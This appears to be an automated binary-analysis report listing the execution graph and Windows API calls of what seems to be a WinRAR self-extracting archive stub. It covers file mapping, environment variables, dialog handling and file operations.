[Execution graph: the interactive node/edge listing is omitted. Recoverable from it: the graph's labelled call sites include a delay-load helper (___delayLoadHelper2@8 with LoadLibraryExA, GetProcAddress, GetLastError, FreeLibrary, RaiseException), DloadProtectSection (VirtualQuery, GetSystemInfo, VirtualProtect), GetModuleFileNameW, CreateFileMappingW, GetFileAttributesW, SetFileAttributesW, DeleteFileW, MoveFileW/MoveFileExW, ExpandEnvironmentStringsW, GetCurrentDirectoryW/SetCurrentDirectoryW, GetExitCodeProcess, GetTickCount, QueryPerformanceCounter, GdipCloneImage/GdipDisposeImage, GetProcessHeap/RtlAllocateHeap/RtlFreeHeap/HeapReAlloc, MultiByteToWideChar/WideCharToMultiByte/LCMapStringW/GetCPInfo/IsValidCodePage, SetUnhandledExceptionFilter/UnhandledExceptionFilter/TerminateProcess, and a dialog message loop (GetDlgItem, SetDlgItemTextW, SendMessageW, PeekMessageW/GetMessageW/IsDialogMessageW/TranslateMessage/DispatchMessageW, ShowWindow, SetFocus, EnableWindow).]
DialogBoxParamW 23858->23863 23859 4abd70 23864 49e617 53 API calls 23859->23864 23867 4abbe3 GetCommandLineW 23861->23867 23895 4abc60 __InternalCxxFrameHandler 23861->23895 23875 49e617 53 API calls 23862->23875 23863->23750 23863->23816 23865 4abd7a SetDlgItemTextW 23864->23865 23936 4912f1 GetDlgItem ShowWindow 23865->23936 23866 4abaed 23869 4abaff 23866->23869 23870 4abaf4 GetLastError 23866->23870 23871 4abbf4 23867->23871 23927 49959a 23869->23927 23870->23869 24026 4ab425 SHGetMalloc 23871->24026 23872 4abd8c SetDlgItemTextW GetDlgItem 23876 4abda9 GetWindowLongW SetWindowLongW 23872->23876 23877 4abdc1 23872->23877 23879 4abd3d 23875->23879 23876->23877 23937 4ac73f 23877->23937 23878 4abc10 24027 4ab425 SHGetMalloc 23878->24027 23883 4abc1c 24028 4ab425 SHGetMalloc 23883->24028 23884 4ac73f 97 API calls 23886 4abddd 23884->23886 23962 4ada52 23886->23962 23887 4abc28 24029 49f3fa 82 API calls 2 library calls 23887->24029 23888 4abccb 23888->23838 23894 4abce1 UnmapViewOfFile CloseHandle 23888->23894 23892 4abc3f MapViewOfFile 23892->23895 23893 4ac73f 97 API calls 23899 4abe03 23893->23899 23894->23838 23895->23888 23896 4abcb7 Sleep 23895->23896 23896->23888 23896->23895 23897 4abe2c 24030 4912d3 GetDlgItem EnableWindow 23897->24030 23899->23897 23901 4ac73f 97 API calls 23899->23901 23900->23750 23900->23772 23901->23897 23903 491378 23902->23903 23904 49131f 23902->23904 24036 49e2c1 GetWindowLongW SetWindowLongW 23903->24036 23906 491385 23904->23906 24035 49e2e8 62 API calls 2 library calls 23904->24035 23906->23740 23906->23741 23906->23742 23908 491341 23908->23906 23909 491354 GetDlgItem 23908->23909 23909->23906 23910 491364 23909->23910 23910->23906 23911 49136a SetWindowTextW 23910->23911 23911->23906 23914 49a0bb 23912->23914 23913 49a175 23913->23800 23913->23801 23914->23913 23915 49a14c 23914->23915 24037 49a2b2 23914->24037 23915->23913 23916 49a2b2 8 API calls 23915->23916 23916->23913 23918->23814 23920 499678 23919->23920 23921 4996d5 
CreateFileW 23920->23921 23923 4996c9 23920->23923 23921->23923 23922 49971f 23922->23866 23923->23922 23924 49bb03 GetCurrentDirectoryW 23923->23924 23925 499704 23924->23925 23925->23922 23926 499708 CreateFileW 23925->23926 23926->23922 23928 4995cf 23927->23928 23929 4995be 23927->23929 23928->23825 23929->23928 23930 4995ca 23929->23930 23931 4995d1 23929->23931 24058 49974e 23930->24058 24063 499620 23931->24063 23934->23847 23935->23859 23936->23872 23938 4ac749 __EH_prolog 23937->23938 23939 4ab314 ExpandEnvironmentStringsW 23938->23939 23944 4abdcf 23938->23944 23951 4ac780 _wcslen _wcsrchr 23939->23951 23941 4ab314 ExpandEnvironmentStringsW 23941->23951 23942 4aca67 SetWindowTextW 23942->23951 23944->23884 23946 4b3e3e 22 API calls 23946->23951 23948 4ac855 SetFileAttributesW 23950 4ac90f GetFileAttributesW 23948->23950 23961 4ac86f __cftof _wcslen 23948->23961 23950->23951 23952 4ac921 DeleteFileW 23950->23952 23951->23941 23951->23942 23951->23944 23951->23946 23951->23948 23954 4acc31 GetDlgItem SetWindowTextW SendMessageW 23951->23954 23957 4acc71 SendMessageW 23951->23957 24078 4a1fbb CompareStringW 23951->24078 24079 4aa64d GetCurrentDirectoryW 23951->24079 24081 49a5d1 6 API calls 23951->24081 24082 49a55a FindClose 23951->24082 24083 4ab48e 76 API calls 2 library calls 23951->24083 23952->23951 23955 4ac932 23952->23955 23954->23951 23956 494092 _swprintf 51 API calls 23955->23956 23958 4ac952 GetFileAttributesW 23956->23958 23957->23951 23958->23955 23959 4ac967 MoveFileW 23958->23959 23959->23951 23960 4ac97f MoveFileExW 23959->23960 23960->23951 23961->23950 23961->23951 24080 49b991 51 API calls 3 library calls 23961->24080 23963 4ada5c __EH_prolog 23962->23963 24084 4a0659 23963->24084 23965 4ada8d 24088 495b3d 23965->24088 23967 4adaab 24092 497b0d 23967->24092 23971 4adafe 24108 497b9e 23971->24108 23973 4abdee 23973->23893 23975 4ad6a8 23974->23975 24602 4aa5c6 23975->24602 23978 4ad6b5 GetWindow 23979 4abf15 23978->23979 23982 4ad6d5 
23978->23982 23979->23747 23979->23748 23980 4ad6e2 GetClassNameW 24607 4a1fbb CompareStringW 23980->24607 23982->23979 23982->23980 23983 4ad76a GetWindow 23982->23983 23984 4ad706 GetWindowLongW 23982->23984 23983->23979 23983->23982 23984->23983 23985 4ad716 SendMessageW 23984->23985 23985->23983 23986 4ad72c GetObjectW 23985->23986 24608 4aa605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23986->24608 23989 4ad743 24609 4aa5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23989->24609 24610 4aa80c 8 API calls 23989->24610 23991 4ad754 SendMessageW DeleteObject 23991->23983 23992->23762 23994 4aabcc 23993->23994 23995 4aabf1 23993->23995 24613 4a1fbb CompareStringW 23994->24613 23996 4aabff 23995->23996 23997 4aabf6 SHAutoComplete 23995->23997 24001 4ab093 23996->24001 23997->23996 23999 4aabdf 23999->23995 24000 4aabe3 FindWindowExW 23999->24000 24000->23995 24002 4ab09d __EH_prolog 24001->24002 24003 4913dc 84 API calls 24002->24003 24004 4ab0bf 24003->24004 24614 491fdc 24004->24614 24007 4ab0eb 24010 4919af 128 API calls 24007->24010 24008 4ab0d9 24009 491692 86 API calls 24008->24009 24012 4ab0e4 24009->24012 24013 4ab10d __InternalCxxFrameHandler ___std_exception_copy 24010->24013 24011 491692 86 API calls 24011->24012 24012->23792 24012->23796 24013->24011 24014->23771 24016 4ab568 5 API calls 24015->24016 24017 4ad4e0 GetDlgItem 24016->24017 24018 4ad502 24017->24018 24019 4ad536 SendMessageW SendMessageW 24017->24019 24024 4ad50d ShowWindow SendMessageW SendMessageW 24018->24024 24020 4ad572 24019->24020 24021 4ad591 SendMessageW SendMessageW SendMessageW 24019->24021 24020->24021 24022 4ad5e7 SendMessageW 24021->24022 24023 4ad5c4 SendMessageW 24021->24023 24022->23785 24023->24022 24024->24019 24025->23850 24026->23878 24027->23883 24028->23887 24029->23892 24030->23900 24031->23830 24032->23851 24033->23823 24034->23812 24035->23908 24036->23906 24038 49a2bf 24037->24038 24039 49a2e3 24038->24039 24040 49a2d6 CreateDirectoryW 24038->24040 24041 49a231 3 
API calls 24039->24041 24040->24039 24042 49a316 24040->24042 24043 49a2e9 24041->24043 24045 49a325 24042->24045 24050 49a4ed 24042->24050 24044 49a329 GetLastError 24043->24044 24046 49bb03 GetCurrentDirectoryW 24043->24046 24044->24045 24045->23914 24048 49a2ff 24046->24048 24048->24044 24049 49a303 CreateDirectoryW 24048->24049 24049->24042 24049->24044 24051 4aec50 24050->24051 24052 49a4fa SetFileAttributesW 24051->24052 24053 49a53d 24052->24053 24054 49a510 24052->24054 24053->24045 24055 49bb03 GetCurrentDirectoryW 24054->24055 24056 49a524 24055->24056 24056->24053 24057 49a528 SetFileAttributesW 24056->24057 24057->24053 24059 499781 24058->24059 24060 499757 24058->24060 24059->23928 24060->24059 24069 49a1e0 24060->24069 24064 49962c 24063->24064 24066 49964a 24063->24066 24064->24066 24067 499638 CloseHandle 24064->24067 24065 499669 24065->23928 24066->24065 24077 496bd5 76 API calls 24066->24077 24067->24066 24070 4aec50 24069->24070 24071 49a1ed DeleteFileW 24070->24071 24072 49977f 24071->24072 24073 49a200 24071->24073 24072->23928 24074 49bb03 GetCurrentDirectoryW 24073->24074 24075 49a214 24074->24075 24075->24072 24076 49a218 DeleteFileW 24075->24076 24076->24072 24077->24065 24078->23951 24079->23951 24080->23961 24081->23951 24082->23951 24083->23951 24085 4a0666 _wcslen 24084->24085 24112 4917e9 24085->24112 24087 4a067e 24087->23965 24089 4a0659 _wcslen 24088->24089 24090 4917e9 78 API calls 24089->24090 24091 4a067e 24090->24091 24091->23967 24093 497b17 __EH_prolog 24092->24093 24129 49ce40 24093->24129 24095 497b32 24135 4aeb38 24095->24135 24097 497b5c 24144 4a4a76 24097->24144 24100 497c7d 24101 497c87 24100->24101 24103 497cf1 24101->24103 24176 49a56d 24101->24176 24104 497d50 24103->24104 24154 498284 24103->24154 24106 497d92 24104->24106 24182 49138b 74 API calls 24104->24182 24106->23971 24109 497bac 24108->24109 24110 497bb3 24108->24110 24111 4a2297 86 API calls 24109->24111 24111->24110 24113 4917ff 24112->24113 24124 49185a 
__InternalCxxFrameHandler 24112->24124 24114 491828 24113->24114 24125 496c36 76 API calls __vswprintf_c_l 24113->24125 24116 491887 24114->24116 24117 491847 ___std_exception_copy 24114->24117 24119 4b3e3e 22 API calls 24116->24119 24117->24124 24127 496ca7 75 API calls 24117->24127 24118 49181e 24126 496ca7 75 API calls 24118->24126 24121 49188e 24119->24121 24121->24124 24128 496ca7 75 API calls 24121->24128 24124->24087 24125->24118 24126->24114 24127->24124 24128->24124 24130 49ce4a __EH_prolog 24129->24130 24131 4aeb38 8 API calls 24130->24131 24132 49ce8d 24131->24132 24133 4aeb38 8 API calls 24132->24133 24134 49ceb1 24133->24134 24134->24095 24136 4aeb3d ___std_exception_copy 24135->24136 24137 4aeb57 24136->24137 24140 4aeb59 24136->24140 24150 4b7a5e 7 API calls 2 library calls 24136->24150 24137->24097 24139 4af5c9 24152 4b238d RaiseException 24139->24152 24140->24139 24151 4b238d RaiseException 24140->24151 24143 4af5e6 24145 4a4a80 __EH_prolog 24144->24145 24146 4aeb38 8 API calls 24145->24146 24147 4a4a9c 24146->24147 24148 497b8b 24147->24148 24153 4a0e46 80 API calls 24147->24153 24148->24100 24150->24136 24151->24139 24152->24143 24153->24148 24155 49828e __EH_prolog 24154->24155 24183 4913dc 24155->24183 24157 4982aa 24158 4982bb 24157->24158 24326 499f42 24157->24326 24161 4982f2 24158->24161 24191 491a04 24158->24191 24322 491692 24161->24322 24167 4983e8 24218 491f6d 24167->24218 24170 4983f3 24170->24161 24222 493b2d 24170->24222 24234 49848e 24170->24234 24172 49a56d 7 API calls 24173 4982ee 24172->24173 24173->24161 24173->24172 24175 498389 24173->24175 24330 49c0c5 CompareStringW _wcslen 24173->24330 24210 498430 24175->24210 24177 49a582 24176->24177 24181 49a5b0 24177->24181 24591 49a69b 24177->24591 24179 49a592 24180 49a597 FindClose 24179->24180 24179->24181 24180->24181 24181->24101 24182->24106 24184 4913e1 __EH_prolog 24183->24184 24185 49ce40 8 API calls 24184->24185 24186 491419 24185->24186 24187 4aeb38 8 API calls 24186->24187 
24190 491474 __cftof 24186->24190 24188 491461 24187->24188 24189 49b505 84 API calls 24188->24189 24188->24190 24189->24190 24190->24157 24192 491a0e __EH_prolog 24191->24192 24204 491a61 24192->24204 24206 491b9b 24192->24206 24331 4913ba 24192->24331 24194 491bc7 24343 49138b 74 API calls 24194->24343 24197 493b2d 101 API calls 24200 491c12 24197->24200 24198 491bd4 24198->24197 24198->24206 24199 491c5a 24203 491c8d 24199->24203 24199->24206 24344 49138b 74 API calls 24199->24344 24200->24199 24202 493b2d 101 API calls 24200->24202 24202->24200 24203->24206 24208 499e80 79 API calls 24203->24208 24204->24194 24204->24198 24204->24206 24205 493b2d 101 API calls 24207 491cde 24205->24207 24206->24173 24207->24205 24207->24206 24208->24207 24364 49cf3d 24210->24364 24212 498440 24368 4a13d2 GetSystemTime SystemTimeToFileTime 24212->24368 24214 4983a3 24214->24167 24215 4a1b66 24214->24215 24373 4ade6b 24215->24373 24219 491f72 __EH_prolog 24218->24219 24221 491fa6 24219->24221 24381 4919af 24219->24381 24221->24170 24223 493b39 24222->24223 24224 493b3d 24222->24224 24223->24170 24233 499e80 79 API calls 24224->24233 24225 493b4f 24226 493b78 24225->24226 24227 493b6a 24225->24227 24514 49286b 101 API calls 3 library calls 24226->24514 24228 493baa 24227->24228 24513 4932f7 89 API calls 2 library calls 24227->24513 24228->24170 24231 493b76 24231->24228 24515 4920d7 74 API calls 24231->24515 24233->24225 24235 498498 __EH_prolog 24234->24235 24238 4984d5 24235->24238 24245 498513 24235->24245 24540 4a8c8d 103 API calls 24235->24540 24237 4984f5 24239 4984fa 24237->24239 24240 49851c 24237->24240 24238->24237 24243 49857a 24238->24243 24238->24245 24239->24245 24541 497a0d 152 API calls 24239->24541 24240->24245 24542 4a8c8d 103 API calls 24240->24542 24243->24245 24516 495d1a 24243->24516 24245->24170 24246 498605 24246->24245 24522 498167 24246->24522 24249 498797 24250 49a56d 7 API calls 24249->24250 24251 498802 24249->24251 24250->24251 24528 497c0d 
24251->24528 24253 49d051 82 API calls 24259 49885d 24253->24259 24254 498992 24255 498a5f 24254->24255 24262 4989e1 24254->24262 24260 498ab6 24255->24260 24272 498a6a 24255->24272 24256 49898b 24545 492021 74 API calls 24256->24545 24259->24245 24259->24253 24259->24254 24259->24256 24543 498117 84 API calls 24259->24543 24544 492021 74 API calls 24259->24544 24264 498a4c 24260->24264 24548 497fc0 97 API calls 24260->24548 24261 498ab4 24265 49959a 80 API calls 24261->24265 24262->24264 24266 49a231 3 API calls 24262->24266 24269 498b14 24262->24269 24263 49959a 80 API calls 24263->24245 24264->24261 24264->24269 24265->24245 24268 498a19 24266->24268 24268->24264 24546 4992a3 97 API calls 24268->24546 24281 498b82 24269->24281 24310 499105 24269->24310 24549 4998bc 24269->24549 24270 49ab1a 8 API calls 24273 498bd1 24270->24273 24272->24261 24547 497db2 101 API calls 24272->24547 24276 49ab1a 8 API calls 24273->24276 24295 498be7 24276->24295 24279 498b70 24553 496e98 77 API calls 24279->24553 24281->24270 24282 498cbc 24283 498d18 24282->24283 24284 498e40 24282->24284 24285 498d8a 24283->24285 24293 498d28 24283->24293 24286 498e52 24284->24286 24287 498e66 24284->24287 24308 498d49 24284->24308 24292 498167 19 API calls 24285->24292 24288 499215 123 API calls 24286->24288 24289 4a3377 75 API calls 24287->24289 24288->24308 24290 498e7f 24289->24290 24559 4a3020 123 API calls 24290->24559 24291 498d6e 24291->24308 24556 4977b8 111 API calls 24291->24556 24297 498dbd 24292->24297 24293->24291 24298 498d37 24293->24298 24295->24282 24300 49981a 79 API calls 24295->24300 24302 498c93 24295->24302 24303 498df5 24297->24303 24304 498de6 24297->24304 24297->24308 24555 492021 74 API calls 24298->24555 24300->24302 24302->24282 24554 499a3c 82 API calls 24302->24554 24558 499155 93 API calls __EH_prolog 24303->24558 24557 497542 85 API calls 24304->24557 24311 498f85 24308->24311 24560 492021 74 API calls 24308->24560 24309 499090 24309->24310 24312 49a4ed 3 API 
calls 24309->24312 24310->24263 24311->24309 24311->24310 24313 49903e 24311->24313 24534 499f09 SetEndOfFile 24311->24534 24314 4990eb 24312->24314 24535 499da2 24313->24535 24314->24310 24561 492021 74 API calls 24314->24561 24317 499085 24318 499620 77 API calls 24317->24318 24318->24309 24320 4990fb 24562 496dcb 76 API calls _wcschr 24320->24562 24323 4916a4 24322->24323 24578 49cee1 24323->24578 24328 499f59 24326->24328 24327 499f63 24327->24158 24328->24327 24590 496d0c 78 API calls 24328->24590 24330->24173 24345 491732 24331->24345 24333 4913d6 24334 499e80 24333->24334 24335 499e92 24334->24335 24338 499ea5 24334->24338 24339 499eb0 24335->24339 24362 496d5b 77 API calls 24335->24362 24337 499eb8 SetFilePointer 24337->24339 24340 499ed4 GetLastError 24337->24340 24338->24337 24338->24339 24339->24204 24340->24339 24341 499ede 24340->24341 24341->24339 24363 496d5b 77 API calls 24341->24363 24343->24206 24344->24203 24346 491748 24345->24346 24357 4917a0 __InternalCxxFrameHandler 24345->24357 24347 491771 24346->24347 24358 496c36 76 API calls __vswprintf_c_l 24346->24358 24349 4917c7 24347->24349 24354 49178d ___std_exception_copy 24347->24354 24351 4b3e3e 22 API calls 24349->24351 24350 491767 24359 496ca7 75 API calls 24350->24359 24353 4917ce 24351->24353 24353->24357 24361 496ca7 75 API calls 24353->24361 24354->24357 24360 496ca7 75 API calls 24354->24360 24357->24333 24358->24350 24359->24347 24360->24357 24361->24357 24362->24338 24363->24339 24365 49cf4d 24364->24365 24367 49cf54 24364->24367 24369 49981a 24365->24369 24367->24212 24368->24214 24370 499833 24369->24370 24372 499e80 79 API calls 24370->24372 24371 499865 24371->24367 24372->24371 24374 4ade78 24373->24374 24375 49e617 53 API calls 24374->24375 24376 4ade9b 24375->24376 24377 494092 _swprintf 51 API calls 24376->24377 24378 4adead 24377->24378 24379 4ad4d4 16 API calls 24378->24379 24380 4a1b7c 24379->24380 24380->24167 24382 4919bb 24381->24382 24383 4919bf 24381->24383 
24382->24221 24386 499e80 79 API calls 24383->24386 24384 4919d4 24387 4918f6 24384->24387 24386->24384 24388 491908 24387->24388 24389 491945 24387->24389 24390 493b2d 101 API calls 24388->24390 24395 493fa3 24389->24395 24393 491928 24390->24393 24393->24382 24399 493fac 24395->24399 24396 493b2d 101 API calls 24396->24399 24397 491966 24397->24393 24400 491e50 24397->24400 24399->24396 24399->24397 24412 4a0e08 24399->24412 24401 491e5a __EH_prolog 24400->24401 24420 493bba 24401->24420 24403 491e84 24404 491732 78 API calls 24403->24404 24406 491f0b 24403->24406 24405 491e9b 24404->24405 24448 4918a9 78 API calls 24405->24448 24406->24393 24408 491eb3 24410 491ebf _wcslen 24408->24410 24449 4a1b84 MultiByteToWideChar 24408->24449 24450 4918a9 78 API calls 24410->24450 24413 4a0e0f 24412->24413 24416 4a0e2a 24413->24416 24418 496c31 RaiseException CallUnexpected 24413->24418 24415 4a0e3b SetThreadExecutionState 24415->24399 24416->24415 24419 496c31 RaiseException CallUnexpected 24416->24419 24418->24416 24419->24415 24421 493bc4 __EH_prolog 24420->24421 24422 493bda 24421->24422 24423 493bf6 24421->24423 24476 49138b 74 API calls 24422->24476 24424 493e51 24423->24424 24428 493c22 24423->24428 24493 49138b 74 API calls 24424->24493 24427 493be5 24427->24403 24428->24427 24451 4a3377 24428->24451 24430 493c71 24432 493ca3 24430->24432 24433 493c9f 24430->24433 24435 493c8f 24430->24435 24431 493d2e 24461 49ab1a 24431->24461 24432->24431 24447 493c9a 24432->24447 24479 49d051 24432->24479 24433->24432 24478 4920bd 78 API calls 24433->24478 24477 49138b 74 API calls 24435->24477 24440 493d41 24441 493dd7 24440->24441 24442 493dc7 24440->24442 24485 4a3020 123 API calls 24441->24485 24465 499215 24442->24465 24445 493dd5 24445->24447 24486 492021 74 API calls 24445->24486 24487 4a2297 24447->24487 24448->24408 24449->24410 24450->24406 24452 4a338c 24451->24452 24454 4a3396 ___std_exception_copy 24451->24454 24494 496ca7 75 API calls 24452->24494 24455 4a341c 
24454->24455 24456 4a34c6 24454->24456 24460 4a3440 __cftof 24454->24460 24495 4a32aa 75 API calls 3 library calls 24455->24495 24496 4b238d RaiseException 24456->24496 24459 4a34f2 24460->24430 24462 49ab28 24461->24462 24463 49ab32 24461->24463 24464 4aeb38 8 API calls 24462->24464 24463->24440 24464->24463 24466 49921f __EH_prolog 24465->24466 24497 497c64 24466->24497 24469 4913ba 78 API calls 24470 499231 24469->24470 24500 49d114 24470->24500 24472 499243 24473 49928a 24472->24473 24475 49d114 118 API calls 24472->24475 24509 49d300 97 API calls __InternalCxxFrameHandler 24472->24509 24473->24445 24475->24472 24476->24427 24477->24447 24478->24432 24480 49d072 24479->24480 24481 49d084 24479->24481 24510 49603a 82 API calls 24480->24510 24511 49603a 82 API calls 24481->24511 24484 49d07c 24484->24431 24485->24445 24486->24447 24489 4a22a1 24487->24489 24488 4a22ba 24512 4a0eed 86 API calls 24488->24512 24489->24488 24492 4a22ce 24489->24492 24491 4a22c1 24491->24492 24493->24427 24494->24454 24495->24460 24496->24459 24498 49b146 GetVersionExW 24497->24498 24499 497c69 24498->24499 24499->24469 24507 49d12a __InternalCxxFrameHandler 24500->24507 24501 49d29a 24502 49d2ce 24501->24502 24503 49d0cb 6 API calls 24501->24503 24504 4a0e08 SetThreadExecutionState RaiseException 24502->24504 24503->24502 24506 49d291 24504->24506 24505 4a8c8d 103 API calls 24505->24507 24506->24472 24507->24501 24507->24505 24507->24506 24508 49ac05 91 API calls 24507->24508 24508->24507 24509->24472 24510->24484 24511->24484 24512->24491 24513->24231 24514->24231 24515->24228 24517 495d2a 24516->24517 24563 495c4b 24517->24563 24519 495d5d 24521 495d95 24519->24521 24568 49b1dc CharUpperW CompareStringW _wcslen ___vcrt_FlsGetValue 24519->24568 24521->24246 24523 498186 24522->24523 24524 498232 24523->24524 24575 49be5e 19 API calls __InternalCxxFrameHandler 24523->24575 24574 4a1fac CharUpperW 24524->24574 24527 49823b 24527->24249 24529 497c22 24528->24529 24530 497c5a 
24529->24530 24576 496e7a 74 API calls 24529->24576 24530->24259 24532 497c52 24577 49138b 74 API calls 24532->24577 24534->24313 24536 499db3 24535->24536 24539 499dc2 24535->24539 24537 499db9 FlushFileBuffers 24536->24537 24536->24539 24537->24539 24538 499e3f SetFileTime 24538->24317 24539->24538 24540->24238 24541->24245 24542->24245 24543->24259 24544->24259 24545->24254 24546->24264 24547->24261 24548->24264 24550 498b5a 24549->24550 24551 4998c5 GetFileType 24549->24551 24550->24281 24552 492021 74 API calls 24550->24552 24551->24550 24552->24279 24553->24281 24554->24282 24555->24308 24556->24308 24557->24308 24558->24308 24559->24308 24560->24311 24561->24320 24562->24310 24569 495b48 24563->24569 24565 495c6c 24565->24519 24567 495b48 2 API calls 24567->24565 24568->24519 24570 495b52 24569->24570 24572 495c3a 24570->24572 24573 49b1dc CharUpperW CompareStringW _wcslen ___vcrt_FlsGetValue 24570->24573 24572->24565 24572->24567 24573->24570 24574->24527 24575->24524 24576->24532 24577->24530 24579 49cef2 24578->24579 24584 49a99e 24579->24584 24581 49cf24 24582 49a99e 86 API calls 24581->24582 24583 49cf2f 24582->24583 24585 49a9c1 24584->24585 24588 49a9d5 24584->24588 24589 4a0eed 86 API calls 24585->24589 24587 49a9c8 24587->24588 24588->24581 24589->24587 24590->24327 24592 49a6a8 24591->24592 24593 49a6c1 FindFirstFileW 24592->24593 24594 49a727 FindNextFileW 24592->24594 24595 49a709 24593->24595 24597 49a6d0 24593->24597 24594->24595 24596 49a732 GetLastError 24594->24596 24595->24179 24596->24595 24598 49bb03 GetCurrentDirectoryW 24597->24598 24599 49a6e0 24598->24599 24600 49a6fe GetLastError 24599->24600 24601 49a6e4 FindFirstFileW 24599->24601 24600->24595 24601->24595 24601->24600 24611 4aa5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24602->24611 24604 4aa5cd 24605 4aa5d9 24604->24605 24612 4aa605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24604->24612 24605->23978 24605->23979 24607->23982 24608->23989 24609->23989 24610->23991 
24611->24604 24612->24605 24613->23999 24615 499f42 78 API calls 24614->24615 24616 491fe8 24615->24616 24617 491a04 101 API calls 24616->24617 24620 492005 24616->24620 24618 491ff5 24617->24618 24618->24620 24621 49138b 74 API calls 24618->24621 24620->24007 24620->24008 24621->24620 25357 4a94e0 GetClientRect 25387 4a21e0 26 API calls std::bad_exception::bad_exception 25409 4af2e0 46 API calls __RTC_Initialize 25410 4bbee0 GetCommandLineA GetCommandLineW 24622 4aeae7 24623 4aeaf1 24622->24623 24624 4ae85d ___delayLoadHelper2@8 14 API calls 24623->24624 24625 4aeafe 24624->24625 25358 4af4e7 29 API calls _abort 25359 4b2cfb 38 API calls 4 library calls 25388 4995f0 80 API calls 25411 495ef0 82 API calls 24642 4b98f0 24650 4badaf 24642->24650 24645 4b9904 24647 4b990c 24648 4b9919 24647->24648 24658 4b9920 11 API calls 24647->24658 24659 4bac98 24650->24659 24653 4badee TlsAlloc 24654 4baddf 24653->24654 24655 4afbbc CatchGuardHandler 5 API calls 24654->24655 24656 4b98fa 24655->24656 24656->24645 24657 4b9869 20 API calls 2 library calls 24656->24657 24657->24647 24658->24645 24660 4bacc8 24659->24660 24662 4bacc4 24659->24662 24660->24653 24660->24654 24662->24660 24664 4bace8 24662->24664 24666 4bad34 24662->24666 24663 4bacf4 GetProcAddress 24665 4bad04 _unexpected 24663->24665 24664->24660 24664->24663 24665->24660 24667 4bad55 LoadLibraryExW 24666->24667 24668 4bad4a 24666->24668 24669 4bad8a 24667->24669 24670 4bad72 GetLastError 24667->24670 24668->24662 24669->24668 24671 4bada1 FreeLibrary 24669->24671 24670->24669 24672 4bad7d LoadLibraryExW 24670->24672 24671->24668 24672->24669 24673 4babf0 24674 4babfb 24673->24674 24676 4bac24 24674->24676 24678 4bac20 24674->24678 24679 4baf0a 24674->24679 24686 4bac50 DeleteCriticalSection 24676->24686 24680 4bac98 _unexpected 5 API calls 24679->24680 24681 4baf31 24680->24681 24682 4baf4f InitializeCriticalSectionAndSpinCount 24681->24682 24683 4baf3a 24681->24683 24682->24683 24684 4afbbc CatchGuardHandler 5 API 
calls 24683->24684 24685 4baf66 24684->24685 24685->24674 24686->24678 25360 4b88f0 7 API calls ___scrt_uninitialize_crt 25390 4afd4f 9 API calls 2 library calls 25362 4ac793 97 API calls 4 library calls 25392 4ab18d 78 API calls 25393 4a9580 CompareStringW ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte 25412 4ac793 102 API calls 5 library calls 25364 4bb49d 6 API calls CatchGuardHandler 25432 496faa 111 API calls 3 library calls 25433 4af3a0 27 API calls 25368 4ba4a0 71 API calls _free 25369 4adca1 DialogBoxParamW 25370 4c08a0 IsProcessorFeaturePresent 25395 4aeda7 48 API calls _unexpected 25434 4a1bbd GetCPInfo IsDBCSLeadByte 24721 4af3b2 24722 4af3be __FrameHandler3::FrameUnwindToState 24721->24722 24753 4aeed7 24722->24753 24724 4af3c5 24725 4af518 24724->24725 24728 4af3ef 24724->24728 24826 4af838 4 API calls 2 library calls 24725->24826 24727 4af51f 24819 4b7f58 24727->24819 24739 4af42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24728->24739 24764 4b8aed 24728->24764 24735 4af40e 24737 4af48f 24772 4af953 GetStartupInfoW __cftof 24737->24772 24739->24737 24822 4b7af4 38 API calls 2 library calls 24739->24822 24740 4af495 24773 4b8a3e 51 API calls 24740->24773 24743 4af49d 24774 4adf1e 24743->24774 24747 4af4b1 24747->24727 24748 4af4b5 24747->24748 24749 4af4be 24748->24749 24824 4b7efb 28 API calls _abort 24748->24824 24825 4af048 12 API calls ___scrt_uninitialize_crt 24749->24825 24752 4af4c6 24752->24735 24754 4aeee0 24753->24754 24828 4af654 IsProcessorFeaturePresent 24754->24828 24756 4aeeec 24829 4b2a5e 24756->24829 24758 4aeef1 24759 4aeef5 24758->24759 24837 4b8977 24758->24837 24759->24724 24762 4aef0c 24762->24724 24765 4b8b04 24764->24765 24766 4afbbc CatchGuardHandler 5 API calls 24765->24766 24767 4af408 24766->24767 24767->24735 24768 4b8a91 24767->24768 24770 4b8ac0 24768->24770 24769 4afbbc CatchGuardHandler 5 API calls 24771 4b8ae9 24769->24771 24770->24769 24771->24739 24772->24740 24773->24743 24930 

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004A0863: GetModuleHandleW.KERNEL32(kernel32), ref: 004A087C
                                                                                                                          • Part of subcall function 004A0863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 004A088E
                                                                                                                          • Part of subcall function 004A0863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 004A08BF
                                                                                                                          • Part of subcall function 004AA64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 004AA655
                                                                                                                          • Part of subcall function 004AAC16: OleInitialize.OLE32(00000000), ref: 004AAC2F
                                                                                                                          • Part of subcall function 004AAC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 004AAC66
                                                                                                                          • Part of subcall function 004AAC16: SHGetMalloc.SHELL32(004D8438), ref: 004AAC70
                                                                                                                        • GetCommandLineW.KERNEL32 ref: 004ADF5C
                                                                                                                        • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 004ADF83
                                                                                                                        • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 004ADF94
                                                                                                                        • UnmapViewOfFile.KERNEL32(00000000), ref: 004ADFCE
                                                                                                                          • Part of subcall function 004ADBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 004ADBF4
                                                                                                                          • Part of subcall function 004ADBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 004ADC30
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 004ADFD7
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,004EEC90,00000800), ref: 004ADFF2
                                                                                                                        • SetEnvironmentVariableW.KERNEL32(sfxname,004EEC90), ref: 004ADFFE
